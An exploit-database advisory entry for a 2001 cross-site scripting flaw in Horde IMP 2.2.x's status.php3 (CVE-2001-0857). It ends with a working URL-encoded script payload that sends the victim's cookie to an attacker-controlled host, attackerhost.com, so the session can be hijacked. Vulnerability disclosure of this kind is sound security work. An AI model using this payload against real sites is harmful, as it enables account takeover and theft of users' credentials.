Horde IMP 2.2.x - Session Hijacking
Author: Joao Pedro Goncalves
type: remote
platform: linux
port:
date_added: 2001-11-09
date_updated: 2012-09-08
verified: 1
codes: CVE-2001-0857;OSVDB-668
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/3525/info
IMP is a powerful web-based mail interface/client developed by members of the Horde project.
Encoded HTML tags are not stripped from requests to access 'status.php3'. It is possible for a remote attacker to construct a link which when clicked will cause arbitrary script code to be executed in the browser of an unsuspecting user in the context of a site running Horde IMP.
As a result, it has been proven that this issue can be exploited to steal a legitimate user's cookie-based authentication credentials and gain unauthorized access to that user's webmail account.
http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript
%3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.co
m%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%
20%27%3E%27)%3B%3C%2Fscript%3E%0A